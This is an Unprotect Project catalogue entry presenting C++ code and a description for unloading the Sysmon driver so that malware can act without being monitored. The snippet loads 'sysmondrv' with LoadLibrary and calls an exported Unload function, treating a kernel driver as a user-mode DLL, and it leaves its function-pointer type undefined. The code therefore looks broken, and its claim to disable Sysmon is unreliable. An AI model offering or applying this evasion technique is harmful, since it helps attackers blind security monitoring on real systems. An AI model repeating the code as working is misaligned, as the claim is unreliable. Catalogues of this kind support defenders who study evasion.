C++ / Unloading Sysmon Driver - Unprotect Project

Windows C++ / Unloading Sysmon Driver

Author	Unprotect
Platform	Windows
Language	C++
Technique	Unloading Sysmon Driver

Description:

This code uses the LoadLibrary() and GetProcAddress() functions to load the Sysmon driver and get the address of its Unload() function. It then calls the Unload() function to unload the driver, which will cause Sysmon to stop recording events and thus evade detection by Sysmon. After the driver has been unloaded, the malware can proceed with its malicious actions without being monitored by Sysmon.

Code

// Load the Sysmon driver
HMODULE hModule = LoadLibrary("sysmondrv");

// Check if the driver was loaded successfully
if (hModule != NULL)
{
    // Get the address of the driver's Unload() function
    PFN_UNLOAD pfnUnload = (PFN_UNLOAD) GetProcAddress(hModule, "Unload");

    // Check if the Unload() function was found
    if (pfnUnload != NULL)
    {
        // Call the Unload() function to unload the driver
        pfnUnload();

        // The Sysmon driver has been unloaded
        // Malware can now proceed with its malicious actions without being monitored by Sysmon
        // ...
    }
}

Download Raw

Created

December 7, 2022

Last Revised

April 22, 2024